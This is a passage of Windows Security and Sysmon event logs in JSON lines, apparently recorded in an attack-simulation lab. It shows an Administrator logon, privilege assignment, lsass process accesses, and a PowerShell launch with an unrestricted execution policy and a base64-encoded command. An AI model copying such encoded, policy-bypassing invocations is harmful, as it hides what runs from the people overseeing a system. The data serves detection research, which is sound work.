indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7a60b","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{40EAEECF-64DC-C99D-2812-C18FD1E8F572}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220552,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7A60B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7a60b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4862,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.221\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.221","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4863,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.221\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.221","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4864,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.236\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-0010FEA40700}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.236","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-0010FEA40700}","TargetProcessId":"4544","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4865,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.252\r\nProcessGuid: {41C8662E-20CD-5F25-0000-0010FEA40700}\r\nProcessId: 4544\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ubisnk2c.g00.ps1\r\nCreationUtcTime: 2020-08-01 07:59:09.252","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.252","ProcessGuid":"{41C8662E-20CD-5F25-0000-0010FEA40700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ubisnk2c.g00.ps1","CreationUtcTime":"2020-08-01 07:59:09.252","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4866,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.283\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-0010FEA40700}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.283","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-0010FEA40700}","TargetProcessId":"4544","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4867,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.283\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-0010FEA40700}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.283","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-0010FEA40700}","TargetProcessId":"4544","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4868,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.345\r\nProcessGuid: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nProcessId: 4652\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CD-5F25-0000-002017A10700}\r\nLogonId: 0x7A117\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-20CD-5F25-0000-0010FEA40700}\r\nParentProcessId: 4544\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGc